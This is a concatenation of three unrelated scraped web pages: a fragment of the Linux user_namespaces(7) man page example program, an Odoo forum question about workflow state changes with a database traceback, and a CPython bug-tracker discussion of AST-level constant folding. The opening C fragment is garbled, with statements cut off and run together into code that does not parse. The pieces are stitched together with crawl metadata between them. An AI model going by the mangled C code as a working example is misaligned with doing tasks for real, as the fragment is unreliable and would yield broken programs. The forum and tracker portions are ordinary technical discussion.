final getopt() argument prevents GNU−style permutation of command−line options. That's useful, since sometimes the 'command' to be executed by this program itself has command−line options. We don't want getopt() to treat those as options to this program. */ flags = 0; verbose = 0; gid_map = NULL; uid_map = NULL; map_zero = 0; while ((opt = getopt(argc, argv, "+imnpuUM:G:zv")) != −1) {]); } } /* −M or −G without −U) == −1) errExit("pipe"); /* Create the child in new namespace(s) */ child_pid = clone(childFunc, child_stack + STACK_SIZE, flags | SIGCHLD, &args); if (child_pid == −1)) == −1) /* Wait for child */ errExit("waitpid"); if (verbose) printf("%s: terminating\n", argv[0]); exit(EXIT_SUCCESS); }
SEE ALSO
This page is part of release 4.13 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at−pages/. | https://man.cx/user_namespaces(7) | CC-MAIN-2017-47 | en | refinedweb |
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
Change State of Sales Order when changing the state of Purchase order?
Hi, I had a new state to Sale Quotation, and two other states to Purchase quotation. Now I needed to when changing the state in Purchase order to automatically change the state of Sale quotation from draft to my new state.
I don't have any idea if this change is in the file mymodule_workflow.xml or in mymodule.py, I've tried in both but nothing...
In mymodule_workflow.xml I've tried this:
.... <record id="trans_receivepq_waitingdocs" model="workflow.transition"> <field name="act_from" ref="sale.act_draft"/> <field name="act_to" ref="act_waitingdocs"/> <field name="signal">purchase_received</field> </record> ....
and after I've tried this:
<record id="act_rfq_received" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">received</field> <field name="kind">function</field> <field name="action">write({'state':'received'})</field> </record> <record id="act_po_recpq" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">po_recpq</field> <field name="kind">subflow</field> <field name="subflow_id" search="[('osv','=','sale.order')]"/> <field name="action">write({'state':'waitingdocs'})</field> </record> <record id="trans_sent_received" model="workflow.transition"> <field name="act_from" ref="purchase.act_sent"/> <field name="act_to" ref="act_rfq_received"/> <field name="signal">purchase_received</field> </record> <record id="trans_sent_received_so" model="workflow.transition"> <field name="act_from" ref="purchase.act_sent"/> <field name="act_to" ref="act_po_recpq"/> <field name="signal">purchase_received</field> </record>
But nothing happens, no error no nothing...
Then I've tried like this in mymodule.py :
def contracts_received(self, cr, uid, ids, context=None, default=None): so = {} soid = {} if not default: default = {} soid = default.get('asd_pquotation_id') so = self.pool.get('sale.order').browse(cr,uid,soid) so.write(cr, uid, ids, {'state':'waitingdocs'}) self.write(cr, uid, ids, {'state':'received'}, context=context) return True
and in mymodule_workflow.xml :
<record id="act_rfq_received" model="workflow.activity"> <field name="wkf_id" ref="purchase.purchase_order"/> <field name="name">received</field> <field name="kind">function</field> <field name="action">contracts_received()</field> </record>
This way I've this error :
WARNING teste28maio1458 openerp.osv.orm: No such field(s) in model purchase.order.line: code, date, so_calc_id, supplier_id, client_number, namecalc, image, quantity. 2013-05-30 16:13:03,052 16600 ERROR teste28maio1458 openerp.sql_db: bad query: insert into "purchase_order_line" (id,"product_uom","order_id","price_unit","product_qty","partner_id","invoiced","date_planned","company_id","name","state","product_id","account_analytic_id",create_uid,create_date,write_uid,write_date) values (20,5,20,'30.00','1.000','5','False','2013-05-30 00:00:00',NULL,'Service',NULL,1,NULL,1,(now() at time zone 'UTC'),1,(now() at time zone 'UTC')) Traceback (most recent call last): File "/opt/openerp-7.0/openerp/sql_db.py", line 227, in execute res = self._obj.execute(query, params) IntegrityError: null value in column "state" violates not-null constraint 2013-05-30 16:13:03,055 16600 ERROR teste28maio1458 openerp.netsvc: Integrity Error The operation cannot be completed, probably due to the following: - deletion: you may be trying to delete a record while other records still reference it - creation/update: a mandatory field is not correctly set [object with reference: state - state] Traceback (most recent call last): File "/opt/openerp-7.0/openerp/netsvc.py", line 289, in dispatch_rpc result = ExportService.getService(service_name).dispatch(method, params) File "/opt/openerp-7.0/openerp/service/web_services.py", line 614, in dispatch res = fn(db, uid, *params) File "/opt/openerp-7.0/openerp/osv/osv.py", line 169, in execute_kw return self.execute(db, uid, obj, method, *args, **kw or {}) File "/opt/openerp-7.0/openerp/osv/osv.py", line 153, in wrapper netsvc.abort_response(1, _('Integrity Error'), 'warning', msg) File "/opt/openerp-7.0/openerp/netsvc.py", line 72, in abort_response raise openerp.osv.osv.except_osv(description, details) except_osv: ('Integrity Error', 'The operation cannot be completed, probably due to the following:\n- deletion: you may be trying to delete a record while other records still reference it\n- creation/update: a mandatory field is not correctly set\n\n[object with reference: state - state]')
Thanks
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now | https://www.odoo.com/forum/help-1/question/change-state-of-sales-order-when-changing-the-state-of-purchase-order-19232 | CC-MAIN-2017-47 | en | refinedweb |
Created on 2011-03-15 04:46 by eltoder, last changed 2017-03-15 06:45 by mbdevpl.
As pointed out by Raymond, constant folding should be done on AST rather than on generated bytecode. Here's a patch to do that. It's rather long, so overview first.
The patch replaces existing peephole pass with a folding pass on AST and a few changes in compiler. Feature-wise it should be on par with old peepholer, applying optimizations more consistently and thoroughly, but maybe missing some others. It passes all peepholer tests (though they seem not very extensive) and 'make test', but more testing is, of course, needed.
I've split it in 5 pieces for easier reviewing, but these are not 5 separate patches, they should all be applied together. I can upload it somewhere for review or split it in other ways, let me know. Also, patches are versus 1e00b161f5f5, I will redo against head.
TOC:
1. Changes to AST
2. Folding pass
3. Changes to compiler
4. Generated files (since they're checked in)
5. Tests
In detail:
1. I needed to make some changes to AST to enable constant folding. These are. For example:
def foo():
"doc" + "string"
Without optimizations foo doesn't have a docstring. After folding, however, the first statement in foo is a string literal. This means that docstring depends on the level of optimizations. Making it an attribute avoids the.
2. Constant folding (and a couple of other tweaks) is performed by a visitor. The visitor is auto-generated from ASDL and a C template. C template (Python/ast_opt.ct) provides code for optimizations and rules on how to call it. Parser/asdl_ct.py takes this and ASDL and generates a visitor, that visits only nodes which have associated rules (but visits them via all paths).
The code for optimizations itself is pretty straight-forward.
The generator can probably be used for symtable.c too, removing ~200 tedious lines of code.
3. Changes to compiler are in 3 categories
a) Updates for AST changes.
b) Changes to generate better code and not need any optimizations. This includes tuple unpacking optimization and if/while conditions.
c) Simple peephole pass on compiler internal structures. This is a better form for doing this, than a bytecode. The pass only deals with jumps to jumps/returns and trivial dead code.
I've also made 'raise' recognized as a terminator, so that 'return None' is not inserted after it.
4, 5. No big surprises here.
I'm confused. Why aren't there review links?
Because I don't know how to make them. Any pointers?
> Because I don't know how to make them. Any pointers?
Martin is hacking on the tool these days... So it's no surprise it
doesn't work perfectly yet ;)
If you have a Google account you can upload these patches to, though.
Thanks. Review link:
The review links didn't come up automatically because 336137a359ae isn't a hg.python.org/cpython revision ID.
I see. Should I attach diffs vs. some revision from hg.python.org?
No need, since you manually created a review on appspot. The local Reitveld links are just a convenience that can avoid the need to manually create a review instance.
Any comments on the code so far or suggestions on how we should move forward?
I've been focusing on softer targets during the sprints - I'll dig into this once I'm back home and using my desktop machine again.
I've updated patches on Rietveld with some small changes. This includes better code generation for boolops used outside of conditions and cleaned up optimize_jumps(). This is probably the last change before I get some feedback.
Also, I forgot to mention yesterday, patches on Rietveld are vs. ab45c4d0b6ef
Just for fun I've run pystones. W/o my changes it averages to about 70k, with my changes to about 72.5k.
A couple of somewhat related issues:
#10399 AST Optimization: inlining of function calls
#1346238 A constant folding optimization pass for the AST
Obviously, ast optimizers should work together and not duplicate.
Nice to see increased attention.
AFAICT my patch has everything that #1346238 has, except BoolOps, which can be easily added (there's a TODO). I don't want to add any new code, though, until the current patch will get reviewed -- adding code will only make reviewing harder.
#10399 looks interesting, I will take a look.
Is anyone looking or planing to look at the patch?
I suspect someone will sometime. There is bit of a backlog of older issues.
Finally got around to reviewing this (just a visual scan at this stage) - thanks for the effort. These are mostly "big picture" type comments, so I'm keeping them here rather than burying them amongst all the details in the code review tool.
The effect that collapsing Num/Str/Bytes into a single Lit node type has on ast.literal_eval bothered me initially, but looking more closely, I think those changes will actually improve the function (string concatenation will now work, and errors like "'hello' - 'world'" should give a more informative TypeError). (Bikeshed: We use Attribute rather than Attr for that node type, perhaps the full "Literal" name would be better, too)
Lib/test/disutil.py should really be made a feature of the dis module itself, by creating an inner disassembly function that returns a string, then making the existing "dis" and "disassembly" functions print that string (i.e. similar to what I already did in making dis.show_code() a thin wrapper around the new dis.code_info() function in 3.2). In the absence of a better name, "dis_to_str" would do.
Since the disassembly is interpreter specific, the new disassembly tests really shouldn't go directly in test_compile.py. A separate "test_ast_optimiser" file would be easier for alternate implementations to skip over. A less fragile testing strategy may also be to use the ast.PyCF_ONLY_AST flag and check the generated AST rather than the generated bytecode.
I'd like to see a written explanation for the first few changes in test_peepholer.py. Are those cases no longer optimised? Are they optimised differently? Why did these test cases have to change? (The later changes in that file look OK, since they seem to just be updating tests to handle the more comprehensive optimisation)
When you get around to rebasing the patch on 3.3 trunk, don't forget to drop any unneeded "from __future__" imports.
The generated code for the Lit node type looks wrong: it sets v to Py_None, then immediately checks to see if v is NULL again.
Don't use "string" as a C type - use "char *" (and "char **" instead of "string *").
There should be a new compiler flag to skip the AST optimisation step.
A bunch of the compiler internal changes seem to make the basic flow of the generated assembly not match the incoming source code..
I think the biggest thing to take out of my review is that I strongly encourage deferring the changes for 5(b) and 5(c).
I like the basic idea of using a template-based approach to try to get rid of a lot of the boilerplate code currently needed for AST visitors.
Providing a hook for optimisation in Python (as Dave Malcolm's approach does) is valuable as well, but I don't think the two ideas need to be mutually exclusive.
As a more general policy question... where do we stand in regards to backwards compatibility of the AST? The ast module docs don't have any caveats to say that it may change between versions, but it obviously *can* change due to new language constructs (if nothing else).
>?
I would provide this via another compile flag a la PyCF_ONLY_AST. If you give only this flag, you get the original AST. If you give (e.g.)
PyCF_OPTIMIZED_AST, you get the resulting AST after the optimization stage (or the same, if optimization has been disabled).
Thanks.
> string concatenation will now work, and errors like "'hello' - 'world'"
> should give a more informative TypeError
Yes, 'x'*5 works too.
> Bikeshed: We use Attribute rather than Attr for that node type,
> perhaps the full "Literal" name would be better
Lit seemed more in line with Num, Str, BinOp etc. No reason it can't be changed, of course.
> Lib/test/disutil.py should really be made a feature of the dis module
> itself
Agreed, but I didn't want to widen the scope of the patch. If this is something that can be reviewed quickly, I can make a change to dis. I'd add a keyword-only arg to dis and disassembly -- an output stream defaulting to stdout. dis_to_str then passes StringIO and returns the string. Sounds OK?
> Since the disassembly is interpreter specific, the new disassembly
> tests really shouldn't go directly in test_compile.py. A separate
> "test_ast_optimiser" file would be easier for alternate
> implementations to skip over.
New tests in test_compiler are not for the AST pass, but for changes to compile.c. I can split them out, how about test_compiler_opts?
> I'd like to see a written explanation for the first few changes in
> test_peepholer.py
Sure.
1) not x == 2 can be theoretically optimized to x != 2, while this test is for another optimization. not x is more robust.
2) Expression statement which is just a literal doesn't produce any code at all. This is now true for None/True/False as well. To preserve constants in the output I've put them in tuples.
> When you get around to rebasing the patch on 3.3 trunk, don't forget
> to drop any unneeded "from __future__" imports.
If you're referring to asdl_ct.py, that's actually an interesting question. asdl_ct.py is run by system installed python2, for obvious reasons. What is the policy here -- what is the minimum version of system python that should be sufficient to build python3? I tested my code on 2.6 and 3.1, and with __future__ it should work on 2.5 as well. Is this OK or should I drop 'with' so it runs on 2.4?
> The generated code for the Lit node type looks wrong: it sets v to
> Py_None, then immediately checks to see if v is NULL again.
Right, comment in asdl_c.py says:
# XXX: special hack for Lit. Lit value can be None and it
# should be stored as Py_None, not as NULL.
If there's a general agreement on Lit I can certainly clean this up.
> Don't use "string" as a C type - use "char *" (and "char **" instead
> of "string *").
string is a typedef for PyObject that ASDL uses. I don't think I have a choice to not use it. Can you point to a specific place where char* could be used?
> There should be a new compiler flag to skip the AST optimisation step.
There's already an 'optimizations level' flag. Maybe we should make it more meaningful rather than multiplying the number of flags?
> A bunch of the compiler internal changes seem to make the basic flow
> of the generated assembly not match the incoming source code.
Can you give an example of what you mean?
The changes are basically 1) standard way of handling conditions in simple compilers 2) peephole.
>.
The reason why I think it makes sense to have this in a single change is testing. This allows to reuse all existing peephole tests. If I leave old peephole enabled there's no way to tell if my pass did something from disassembly. I can port tests to AST, but that seemed like more work than match old peepholer optimizations.
Is there any opposition to doing simple optimizations on compiler structures? They seem a good fit for the job. In fact, if not for stack representation, I'd say that they are better IR for optimizer than AST.
Also, can I get your opinion on making None/True/False into literals early on and getting rid of forbidden_name?
Antoine, Georg -- I think Nick's question is not about AST changing after optimizations (this can indeed be a separate flag), but the structure of AST changing. E.g. collapsing of Num/Str/Bytes into Lit.
Btw, if this is acceptable I'd make a couple more changes to make scope structure obvious from AST. This will allow auto-generating much of the symtable pass.
> and with __future__ it should work on 2.5 as well.
Actually, seems that at least str.format is not in 2.5 as well. Still the question is should I make it run on 2.5 or 2.4 or is 2.6 OK (then __future__ can be removed).
> not x == 2 can be theoretically optimized to x != 2, ...
I don't think it can:
>>> class X:
... def __eq__(self, other):
... return True
... def __ne__(self, other):
... return True
...
>>> x = X()
>>>
>>> not x == 2
False
>>> x != 2
True
>>>
> I don't think it can:
That already doesn't work in dict and set (eq not consistent with hash), I don't think it's a big problem if that stops working in some other cases. Anyway, I said "theoretically" -- maybe after some conservative type inference.
Also, to avoid any confusion -- currently my patch only runs AST optimizations before code generation, so compile() with ast.PyCF_ONLY_AST returns non-optimized AST.
While I would not be happy to use class X above, the 3.2 manual explicitly says "There are no implied relationships among the comparison operators. The truth of x==y does not imply that x!=y is false. " .
OK, I missed the fact that the new optimisation pass isn't run under PyCF_ONLY_AST.
However, as Eugene picked up, my concern is actually with the collapsing of Str/Num/Bytes/Ellipsis into the new Lit node, and the changes to the way None/True/False are handled. They're all changes that *make sense*, but would also likely cause a variety of AST manipulations to break. We definitely don't care when bytecode hacks break, but providing the ast module means that AST manipulation is officially supported.
However, the reason I bring up new constructs, is the fact that new constructs may break AST manipulation passes, even if the old structures are left intact - the AST visitor may miss (or misinterpret) things because it doesn't understand the meaning of the new nodes.
We may need to take this one back to python-dev (and get input from the other implementations as well). It's a fairly fundamental question when it comes to the structure of any changes.
If we have to preserve backward compatibility of Python AST API, we can do this relatively easily (at the expense of some code complexity):
* Add 'version' argument to compile() and ast.parse() with default value of 1 (old AST). Value 2 will correspond to the new AST.
* Do not remove Num/Str/Bytes/Ellipsis Python classes. Make PyAST_obj2mod and PyAST_mod2obj do appropriate conversions when version is 1.
* Possibly emit a PendingDeprecationWarning when version 1 is used with the goal of removing it in 3.5
Alternative implementation is to leave Num/Str/etc classes in C as well, and write visitors (similar to folding one) to convert AST between old and new forms.
Does this sounds reasonable? Should this be posted to python-dev? Should I write a PEP (I'd need some help with this)?
Are there any other big issues preventing this to be merged?
Eugene, I think you're doing great work here and would like to see you succeed. In the near term, I don't have time to participate, but don't let that stop you.
Is there any tool to see how it works step-by-step. The whole stuff is extremely interesting, but I can't fit all the details of AST processing in my head.
Eugene: I suggest raising the question on python-dev. The answer potentially affects the PEP 380 patch as well (which adds a new attribute to the "Yield" node).
Anatoly: If you just want to get a feel for the kind of AST various pieces of code produce, then the "ast.dump" function (along with using the ast.PyCF_ONLY_AST flag in compile) may be enough.
You may also want to take a look at the AST -> dot file conversion code in Dave Malcolm's patches on #10399.
Eugene raised the question of AST changes on python-dev [1] and the verdict was that so long as ast.__version__ is updated, AST clients will be able to cope with changes.
Benjamin Peterson made some subsequent changes to the AST (bringing the AST for try and with statements more in line with the concrete syntax, allowing source-to-source transforms to retain the original code structure).
This patch will probably need to be updated to be based on the latest version of the AST - I would be surprised if it applied cleanly to the current tip.
[1]
Updated the title to reflect that the peephole optimizer will likely continue to exist but in a much simpler form. Some complex peephole optimization such as constant folding can be handled more easily and more robustly at the AST level.
Other minor peephole optimizations such as jump-to-jump simplification as still bytecode level optimizations (ones that improve the quality of the generated code without visibility to higher level semantics).
Nick, if there's an interest in reviewing the patch I can update the it. I doubt it needs a lot of changes, given that visitor is auto-generated.
Raymond, the patch contains a rewrite of low-level optimizations to work before byte code generation, which simplifies them a great deal.
As Raymond noted though, some of the block stack fiddling doesn't make sense until after the bytecode has already been generated. It's OK to have multiple optimisers at different layers, each taking care of the elements that are best suited to that level.
And yes, an updated patch against the current tip would be good. Of my earlier review comments, the ones I'd still like to see addressed are:
- finish clearing out the now redundant special casing of None/True/False
- separating out the non-AST related compiler tweaks (i.e. 3b and 3c and the associated test changes) into their own patch (including moving the relevant tests into a separate @cpython_only test case)
I'm still not 100% convinced on that latter set of changes, but I don't
want my further pondering on those to hold up the rest of the patch. (they probably make sense, it's just that the AST level changes are much easier to review than the ones right down at the bytecode generation level - reviewing the latter means getting back up to speed on precisely how the block stack works and it will be a while before I get around to doing that. It's just one of those things where the details matter, but diving that deep into the compiler is such a rare occurrence that I have to give myself a refresher course each time it happens).
I.
Marking the PEP 380 implementation as a dependency, as I expect it to be easier to update this patch to cope with those changes than it would be the other way around.
Bumping the target version to 3.4.
This is still a good long term idea, but it's a substantial enough change that we really want to land it early in a development cycle so we have plenty of time to hammer out any issues.
Good call, Nick.
In msg132312 Nick asked "where do we stand in regards to backwards compatibility of the AST?"
The current ast module chapter, second sentence, says ""The abstract syntax itself might change with each Python release;" this module helps to find out programmatically what the current grammar looks like."
where 'current grammar' is copied in 30.2.2. Abstract Grammar.
I do not know when that was written, but it clearly implies the the grammark, which defines node classes, is x.y version specific. I think this is the correct policy just so we can make changes, hopefully improvements, such as the one proposed here.
I'm working on a AST optimizer for Python 2.6-3.3:
It is implemented in Python and is able to optimize much more cases than the current bytecode peepholer.
All of the optimisations that assume globals haven't been shadowed or rebound are invalid in the general case.
E.g. print(1.5) and print("1.5") are valid for *our* print function, but we technically have no idea if they're equivalent in user code.
In short, if it involves a name lookup and that name isn't reserved to the compiler (e.g. __debug__) then no, you're not allowed to optimise it at compile time if you wish to remain compliant with the language spec. Method calls on literals are always fair game, though (e.g. you could optimise "a b c".split())
Any stdlib AST optimiser would need to be substantially more conservative by default.
> All of the optimisations that assume globals haven't been shadowed
> or rebound are invalid in the general case.
My main idea is that the developer of the application should be able to annotate functions and constants to declare them as "optimizable" (constant). I chose to expect builtins as not being overrided, but if it breaks applications, it can be converted to an option disabled by default.
There is a known issue: test_math fails because pow() is an alias to matH.pow() in doctests. The problem is that "from math import *" is called and the result is stored in a namespace, and then "pow(2,4)" is called in the namespace. astoptimizer doesn't detect that pow=math.pow because locals are only set when the code is executed (and not at compilation) with something like: exec(code, namespace). It is a limitation of the optimizer. A workaround is to disable optimizations when running tests.
It is possible to detect that builtins are shadowed (ex: print=myprint). astoptimizer has an experimental support of assignments, but it only works on trivial examples yet (like "x=1; print(x)") and is disabled by default (because it is buggy). I also plan to disable some optimizations if globals(), vars() or dir() is called.
> Any stdlib AST optimiser would need to be substantially more conservative by default.
FYI The test suite of Python 2.7 and 3.3 pass with astoptimizer... except some "minor" (?) failures:
* test_math fails for the reason explained above
* test_pdb: it looks to be an issue with line number (debuggers don't like optimizers :-))
* test_xml_etree and test_xml_etree_c: reference count of the None singleton
The test suite helped me to find bugs in my optimizer :-)
I also had to add some hacks (hasattr) for test_ast (test_ast generates invalid AST trees). The configuration should also be adapted for test_peepholer, because CPython peepholer uses a limit of 20 items, whereas astoptimizer uses a limit of 4096 bytes/characters for string by default. All these minor nits are now handled in a specific "cpython_tests" config.
No, you're assuming global program analysis and *that is not a valid assumption*.
One of the key features of Python is that *monkeypatching works*. It's not encouraged, but it works.
You simply cannot play games with name lookups like this without creating something that is no longer Python.
You also have to be very careful of the interface to tracing functions, such as profilers and coverage analysis tools.
> Method calls on literals are always fair game, though (e.g. you could optimise "a b c".split())
What about optimizations that do not change behavior, except for different error messages? E.g. we can change
y = [1,2][x]
to
y = (1,2)[x]
where the tuple is constant and is stored in co_consts. This will, however, produce a different text in the exception when x is not 0 or 1. The type of exception is going to be the same.
The peephole optimiser already makes optimisations like that in a couple of places (e.g. set -> frozenset):
>>> def f(x):
... if x in {1, 2}: pass
...
>>> f.__code__.co_consts
(None, 1, 2, frozenset({1, 2}))
It's name lookup semantics that are the real minefield. It's one of the reasons PyPy's JIT can be so much more effective than a static optimiser - because it's monitoring real execution and inserting the appropriate guards it's not relying on invalid assumptions about name bindings.
If I'm not missing something, changing
x in [1,2]
to
x in (1,2)
and
x in {1,2}
to
x in frozenset([1,2])
does not change any error messages.
Agreed that without dynamic compilation we can pretty much only track literals (including functions and lambdas) assigned to local variables. might also play into this if it happens to go in.
Just noting for the record (since it appears it was never brought back to the comments): it is expected that programs that manipulate the AST may require updates before they will work on a new version of Python. Preserving AST backwards compatbility is too limiting to the evolution of the language, so only source compatibility is promised.
(That was the outcome of the suggested AST discussions on python-dev that were mentioned earlier)
Regenerated for review.
"issue11549.patch: serhiy.storchaka, 2016-05-11 08:22: Regenerated for review"
diff -r 1e00b161f5f5 PC/os2emx/python33.def
--- a/PC/os2emx/python33.def Wed Mar 09 12:53:30 2011 +0100
+++ b/PC/os2emx/python33.def Wed May 11 11:21:24 2016 +0300
The revision 1e00b161f5f5 is 4 years old. The patch looks very outdated :-/
Fairly sure it's 5 years old.
Yes, the patch is outdated, conflicts with current code (and would conflict even more after pushing the wordcode patch) and contains bugs. But it moved in right direction, I think your _PyCode_ConstantKey() could help to fix bugs. I'm going to revive this issue.
Serhiy: Nice! Yes, _PyCode_ConstantKey solved the problem.
But #16619 went in the opposite direction of this patch, and introduced a new type of literal node instead of unifying the existing ones. Kind of a shame, since *this* patch, I believe, both fixes that bug and removes the unreachable code in the example :)
I also see that Victor has been doing some of the same work, e.g. #26146.
> I also see that Victor has been doing some of the same work, e.g. #26146.
ast.Constant idea directly comes from your work. The implementatiln may ve
different.
It's a first step for AST optimizers.
@haypo, how do you think about ast.Lit and ast.Constant?
Is this patch updated to use ast.Constant?
Or ast.Constant should be used only for some transform like constant folding?
> @hay.
Hugo Geoffroy added the comment:
>`.
Since the Python compiler doesn't produce ast.Constant, there is no
change in practice in ast.literal_eval(). If you found a bug, please
open a new issue.
> At least [this library]() would have a serious risk of remote DoS :
I tried hard to implement a sandbox in Python and I failed:
I don't think that literal_eval() is safe *by design*.
Good point Hugo. Yes, this should be taken into account when move constant folding to AST level. Thank you for the reminder.
> Since the Python compiler doesn't produce ast.Constant, there is no
change in practice in ast.literal_eval(). If you found a bug, please
open a new issue.
Currently there is no a bug in ast.literal_eval() because the '**' operator is not accepted.
>>> ast.literal_eval("2**2**32")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/serhiy/py/cpython/Lib/ast.py", line 85, in literal_eval
return _convert(node_or_string)
File "/home/serhiy/py/cpython/Lib/ast.py", line 84, in _convert
raise ValueError('malformed node or string: ' + repr(node))
ValueError: malformed node or string: <_ast.BinOp object at 0xb6f2fa4c>
But if move the optimization to AST level this can add a vulnerability to DOS attack. The optimizer should do additional checks first than execute operators that can return too large value or take too much CPU time. Currently this vulnerability have place in the peephole optimizer.
> Currently there is no a bug in ast.literal_eval() because the '**' operator is not accepted.
The doc says "This can be used for safely evaluating strings containing Python values from untrusted sources without the need to parse the values oneself. It is not capable of evaluating arbitrarily complex expressions, for example involving operators or indexing."
I don't think that it's a bug, but a deliberate design choice. a**b is an obvious trick to DoS a server (high CPU and memory usage).
Hugo, Serhiy, and Victor: I think you're all agreeing with each other, but to make sure I'm understanding the point correctly:
1. ast.literal_eval() is currently safe from malicious code like "100000 ** 100000" or "1073741824 * 'a'" because it only traverses addition and subtraction nodes, so any such operations will just throw ValueError (As a point of interest: unary plus and minus are required to support positive and negative numeric literals, while binary addition and subtraction are required to support complex number literals. So the status quo isn't precisely the result of a conscious security decision, it's just a minimalist implementation of exactly what's necessary to support all of the builtin types, which also provides some highly desirable security properties when evaluating untrusted code)
2. an eager constant folding optimisation in the AST tier would happen *before* literal_eval filtered out the multiplication and exponentiation nodes, and hence would make literal_eval vulnerable to remote DOS attacks in cases where it is expected to be safe
However, that's not exactly how this patch works: if you pass "PyCF_ONLY_AST" as ast.parse does, it *doesn't* run the constant-folding step. Instead, the constant folding is run as an AST-to-AST transform during the AST-to-bytecode compilation step, *not* the initial source-to-AST step. (see )
This has a few nice properties:
- ast.literal_eval() remains safe
- source -> AST -> source transformation pipelines continue to preserve the original code structure
- externally generated AST structures still benefit from the AST optimisation pass
- we don't need a new flag to turn this optimisation pass off when generating the AST for a given piece of source code
> 1. Changes to AST
I'm working on updating this part. There are some failing tests remains.
But I doubt this stage is worth enough for now.
>.
We have already Constant and NameConstant. So it seems there are no need for
None, Bool, TupleConst, SetConst nodes.
I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
is easier than fixing all tests.
>.
Take docstring before constant folding isn't enough?
(I'm sorry if I'm wrong. I haven't tried it.
They are all NameConstant already.
> We have already Constant and NameConstant. So it seems there are no need for
> None, Bool, TupleConst, SetConst nodes.
Yes, Constant is Victor's version of Lit.
> I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
> is easier than fixing all tests.
Fixing tests was fairly easy the last time. I think the question is what changes to the public API of AST are acceptable.
>.
> They are all NameConstant already.
Keep in mind this patch is 6 years old :)
>> We have already Constant and NameConstant. So it seems there are no need for
>> None, Bool, TupleConst, SetConst nodes.
> Yes, Constant is Victor's version of Lit.
Then, may I remove ast.Lit, and use Constant and NameConstant?
>> I think converting Num, Str, Bytes, Ellipsis into Constant in folding stage
>> is easier than fixing all tests.
> Fixing tests was fairly easy the last time. I think the question is what changes to the public API of AST are acceptable.
I think backward compatibility is not guaranteed.
But there are some usage of ast. ( )
So I think we should make change small as possible.
>>.
OK.
>> They are all NameConstant already.
> Keep in mind this patch is 6 years old :)
I know. I want to move this patch forward, but I'm not frontend (parser, AST, and compiler) expert.
I can't make design decision without expert's advice. Thanks for your reply.
Then, may I update the patch in following direction?
* Remove ast.Lit.
* Keep docstring change.
If you would like to implement constant folding at the AST level, I suggest
you to look at my fatoptimizer project:
The tricky part is to avoid operations when we know that it will raise an
exception or create an object too big according to our constraints.
I would prefer to implement an AST optimizer in Python, but converting C
structures to Python objects and then back to C structures has a cost. I'm
not sure that my optimizer implemented in Python is fast enough.
By the way, an idea would be to skip all optimizations in some cases like
for script.py when running python3 script.py.
Before trying advanced optimizations, I want move suspended obvious optimizations forwards.
For example, removing unused constants is suspended because constant folding
should be moved from peephole to AST. This is why I found this issue.
After that, I'm thinking about shrinking stacksize. frame_dealloc (scans whole stack) is one of hot functions.
Dropping ast.Lit is fine. As for the docstring part, I'm torn. Yes it's nice as that will show up semantically in the Python code, but it's also easy to check for by just looking if the first statement is a Str (or Constant if that's what we make all strings). So I'll say I'm +0 on the docstring part.
At the AST level, you have a wide range of possible optimizations. See the optimizations that I implemented in fatoptimizer (FAT Python) to have an idea:
FAT Python adds guards checked at runtime, something not possible (not wanted) here.
But if you start with constant folding, why not implementing constant propagation as well? What about loop unrolling?
Where is the limit? If you implement the AST optimizer in C, the limit will probably be your C skills and your motivation :-) In Python, the limit is more the Python semantics which is... hum... not well defined. For example, does it break the Python semantics to replace [i for i in (1, 2, 3)] with [1, 2, 3]?
What if you use a debugger? Do yo expect a list comprehension or a literal list?
FYI I suspended my work on FAT Python because almost no other core developer was interested. I didn't get any support, whereas I need support to push core FAT Python features like function specialization and runtime checks (PEP 510, see also PEP 511). Moreover, I failed to show any significant speedup on non-trivial functions. I abandoned before investigating function inlining, even if FAT Python already has a basic support for function inlining.
This issue is open since 2011. The question is always the same: is it worth it?
An alternative is to experiment an AST optimizer outside CPython and come back later with more data to drive the design of such optimizer. With FAT Python, I chose to add hooks in the Python compiler, but different people told me that it's possible to do that without such hook but importlib (importlib hooks).
What do you think Naoki?
Yes, doing optimizations on AST in CPython is unlikely to give any sizable speed improvements in real world programs. Python as a language is not suited for static optimization, and even if you manage to inline a function, there's still CPython's interpreted overhead and boxed types that dwarf the effect of the optimization.
The goal of this patch was never to significantly improve the speed. It was to replace the existing bytecode peephole pass with cleaner and simpler code, which also happens to produce slightly better results.
My motivation is improve speed, reduce memory usage, and quicker
startup time for real world applications. If some optimization in
FAT optimizer has significant speedup, I want to try it.
But this time, my motivation is I felt "everyone think constant folding
should go to AST from peephole, there is a patch about it, but unfortunately
it was suspended (because of lack of reviewers, maybe)."
As reading #28813, I think there are consensus about constant folding
should go AST.
INADA Naoki added the comment:
> My motivation is improve speed,
Ah, if the motivation is performance, I would like to see benchmark
results :-) I understand that an AST optimizer would help to produce
more efficient bytecode, right?
> reduce memory usage,
I noticed an issue with the peephole optimizer: the constant folding
step keeps original constants. Moving constant folding to the AST
stage fixes this issue by design.
> and quicker startup time for real world applications.
You mean faster import time on precompiled .pyc files, right? It's
related to the hypothetical faster bytecode.
> If some optimization in FAT optimizer has significant speedup, I want to try it.
See
FYI it took me something like 2 months to build FAT Python
"infrastructure": fix CPython bugs, design guards, design the AST
optimizer, write unit tests, etc. I didn't spend much time on
efficient optimizations. But for my first rule was to not break the
CPython test suite! Not break the Python semantics, otherwise it would
be impossible to put enable the optimizer by default in CPython, which
is my long term goal.
I've tried to update ast_opt.c[t] without changing AST.
But I can't find clear way to solve "foo" + "bar" docstring problem.
This patch adds only docstring to AST.
Naoki: Can you please open a new issue for your ast-docstring.patch change? I like it, but this issue became too big, and I'm not sure that everyone in the nosy list is interested by this specific change.
I submit new issues:
* #29463 for AST change (change docstring from first statement to attribute).
* #29469 for constant folding
Note that this issue contains more peephole -> AST optimization changes.
But I want to start these two patch to ease review and discussion.
I created the issue #29471: "AST: add an attribute to FunctionDef to distinguish functions from generators and coroutines". | https://bugs.python.org/issue11549 | CC-MAIN-2019-26 | en | refinedweb |
